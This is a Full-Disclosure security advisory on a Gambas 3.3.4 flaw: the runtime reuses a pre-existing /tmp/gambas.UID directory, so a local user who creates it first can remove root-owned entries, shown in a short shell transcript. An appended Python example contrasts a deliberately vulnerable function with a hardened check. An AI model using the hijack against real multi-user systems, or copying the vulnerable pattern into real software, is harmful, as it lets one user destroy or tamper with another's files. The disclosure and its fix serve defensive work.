
[Full-disclosure] Gambas 3.3.4 Directory hijack vulnerability



Gambas 3.3.4 Directory hijack vulnerability


The gambas software package creates a working directory in /tmp without verifying that
another user hasn't already created it. This allows a local user to hijack ownership of
that directory and of whatever Gambas later places in it. This advisory was taken from
the bug filed with the developers.

1) Describe the problem:

Gambas creates a directory in /tmp called gambas.UID, where UID is the user id of the
person running the software. Gambas doesn't check whether a malicious user has already
created that directory.

Because /tmp is world-writable, a malicious user can pre-create gambas.UID for any UID,
including 0, and so own the parent directory. That user can then manipulate (mv or remove)
what Gambas creates under it, even when those entries belong to root:

larry@aliquot:/tmp$ mkdir gambas.0
larry@aliquot:/tmp$ ls -ld gambas.0
drwxr-xr-x 2 larry staff 4096 2012-12-13 16:37 gambas.0
larry@aliquot:/tmp$ cd gambas.0
larry@aliquot:/tmp/gambas.0$ ls
larry@aliquot:/tmp/gambas.0$ ls -l
total 4
drwx------ 2 root root 4096 2012-12-13 16:37 25257
larry@aliquot:/tmp/gambas.0$ rm -rf 25257
larry@aliquot:/tmp/gambas.0$

User larry was able to remove the directory gambas created as root.

2) Software Details

Version: gambas3-runtime-3.3.4~lucid2
Revision:
Operating system: Linux
Distribution: Ubuntu
Architecture: x86_64
GUI component: QT3 / QT4 / GTK+
Desktop used: Gnome

3) Provide a little project that reproduces the bug or the crash.

ubuntu-builder runs as root, so the working directory Gambas creates for it is
/tmp/gambas.0, the directory pre-created by the unprivileged user above.


See bug posted here for details and fix from vendor:

http://code.google.com/p/gambas/issues/detail?id=365

@_larry0
Larry W. Cashdollar

http://otiose.dhs.org
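The check the advisory says is missing, shown as an added example that is neither Gambas code nor the vendor's fix from the linked bug. The vulnerable pattern creates the directory and carries on when it already exists; the hardened version creates it with mode 0700, opens it with O_NOFOLLOW|O_DIRECTORY, and verifies owner and permission bits on the open descriptor before handing that descriptor (not the path) to callers, so the directory that was checked is the one that gets used. Function names (`vulnerable_tmpdir`, `safe_tmpdir`, `create_in_dir`, `demo`) and the constructed sample tree are illustrative assumptions; because the demo cannot run as two users, its pre-created "gambas.UID" directory is caught by the permission-bit check rather than the owner check that would reject larry's directory in the real scenario.

```python
import os
import stat
import tempfile


def vulnerable_tmpdir(path):
    """The pattern described in the advisory: create /tmp/gambas.UID and carry on
    even if it already exists, never checking who owns it or how it is set up."""
    try:
        os.mkdir(path, 0o700)
    except FileExistsError:
        pass  # a directory planted by another user is silently accepted
    return path


def safe_tmpdir(path):
    """Create or reuse a per-user working directory safely.

    Returns an open directory fd. Callers should pass it as dir_fd= for every
    further operation so they work inside the very inode that was verified.
    """
    try:
        os.mkdir(path, 0o700)
    except FileExistsError:
        pass  # decide below whether the existing entry is trustworthy
    # O_NOFOLLOW: refuse a symlink planted at the path (ELOOP).
    # O_DIRECTORY: refuse anything that is not a directory (ENOTDIR).
    fd = os.open(path, os.O_RDONLY | os.O_DIRECTORY | os.O_NOFOLLOW)
    try:
        st = os.fstat(fd)  # inspect the opened inode, not the path, to avoid a check/use race
        if st.st_uid != os.getuid():
            raise PermissionError(
                f"{path} is owned by uid {st.st_uid}, not uid {os.getuid()}")
        if st.st_mode & 0o077:
            raise PermissionError(
                f"{path} is group/world accessible (mode {oct(stat.S_IMODE(st.st_mode))})")
    except Exception:
        os.close(fd)
        raise
    return fd


def create_in_dir(dirfd, name, data):
    """Create a fresh file relative to the verified directory fd.
    O_EXCL refuses a pre-planted file, O_NOFOLLOW a pre-planted symlink."""
    fd = os.open(name, os.O_WRONLY | os.O_CREAT | os.O_EXCL | os.O_NOFOLLOW,
                 0o600, dir_fd=dirfd)
    try:
        os.write(fd, data)
    finally:
        os.close(fd)


def demo():
    """Constructed reproduction of the advisory's scenario in a private temp tree
    (sample data, not a live /tmp): a pre-created gambas.UID directory, a planted
    symlink, and a fresh path. Returns which checks behaved as intended."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        uid = os.getuid()

        # "Another user" pre-created gambas.UID. In the advisory it is larry's 0755
        # directory; here we cannot change uid, so we make it world-accessible, which
        # the permission-bit check rejects just as the owner check would reject larry's.
        hijacked = os.path.join(tmp, f"gambas.{uid}")
        os.mkdir(hijacked, 0o777)
        os.chmod(hijacked, 0o777)  # apply regardless of umask
        results["vulnerable_accepts_hijacked"] = vulnerable_tmpdir(hijacked) == hijacked
        try:
            os.close(safe_tmpdir(hijacked))
            results["safe_rejects_hijacked"] = False
        except PermissionError:
            results["safe_rejects_hijacked"] = True

        # A symlink planted at the expected path: mkdir sees EEXIST, open sees ELOOP.
        link = os.path.join(tmp, f"gambas.{uid}.link")
        os.symlink(tmp, link)
        try:
            os.close(safe_tmpdir(link))
            results["safe_rejects_symlink"] = False
        except OSError:
            results["safe_rejects_symlink"] = True

        # Nobody got there first: created 0700, accepted, and usable through dir_fd.
        fresh = os.path.join(tmp, f"gambas.{uid}.fresh")
        fd = safe_tmpdir(fresh)
        try:
            create_in_dir(fd, "25257", b"work")
            results["safe_accepts_fresh"] = stat.S_IMODE(os.fstat(fd).st_mode) == 0o700
            with open(os.path.join(fresh, "25257"), "rb") as f:
                results["file_written"] = f.read() == b"work"
        finally:
            os.close(fd)
    return results


if __name__ == "__main__":
    for check, ok in demo().items():
        print(f"{check}: {'ok' if ok else 'FAILED'}")
```

The owner and mode checks run on the descriptor returned by open(2), so an attacker who swaps the directory between mkdir and the check is caught, and one who swaps it afterwards cannot affect a process that keeps using the descriptor with dir_fd. A directory that fails the check should be treated as an error, not silently replaced, since removing it would mean deleting another user's files.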
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/